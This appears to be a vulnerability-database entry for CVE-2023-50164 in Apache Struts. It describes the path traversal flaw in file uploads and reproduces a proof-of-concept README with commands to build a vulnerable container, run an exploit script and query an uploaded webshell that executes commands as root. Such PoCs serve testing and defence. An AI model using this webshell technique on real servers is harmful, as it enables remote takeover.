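Associated vulnerability
Title:
Apache Struts security vulnerability
(CVE-2023-50164)
Description: Apache Struts is an open-source project of the US-based Apache foundation. It is an open-source MVC framework for building enterprise Java web applications and is provided in two main framework versions, Struts 1 and Struts 2. Apache Struts contains a security vulnerability caused by a path traversal flaw in the file upload parameters. An attacker can exploit it to upload a malicious file and execute remote code. Affected products and versions: Apache Struts 2.0.0 through 2.5.32 and 6.0.0 through 6.3.0.1.
Description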
CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept
Introduction
# CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept
This PoC has been made to test an RCE (Remote Code Execution) by exploiting the Apache Struts2 vulnerability.

Build the image and run a container:
```console
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
```
Run the exploit:
```console
$ cd exploit
$ ./exploit.sh
```
Now you can execute arbitrary commands on the server side, as shown:
```console
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)
```
## Credits
- Thanks to @jakabakos for an example of vulnerable application (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
- Thanks to Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) for the diagram here above
File snapshot
[4.0K] /data/pocs/a7b254a32dc67fffcd1600ccff2891524fcae2d9
├── [ 347] Dockerfile
├── [4.0K] exploit
│   ├── [ 132] exploit.sh
│   └── [ 527] webshell.jsp
├── [4.0K] img
│   └── [422K] 1.png
├── [4.7K] pom.xml
├── [ 930] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] it
        │       └── [4.0K] sunnyvale
        │           └── [4.0K] struts2rcepoc
        │               └── [1.8K] Upload.java
        ├── [4.0K] resources
        │   └── [ 874] struts.xml
        └── [4.0K] webapp
            ├── [ 189] index.html
            └── [4.0K] WEB-INF
                ├── [ 578] error.jsp
                ├── [ 599] success.jsp
                ├── [ 569] upload.jsp
                └── [ 779] web.xml

11 directories, 13 files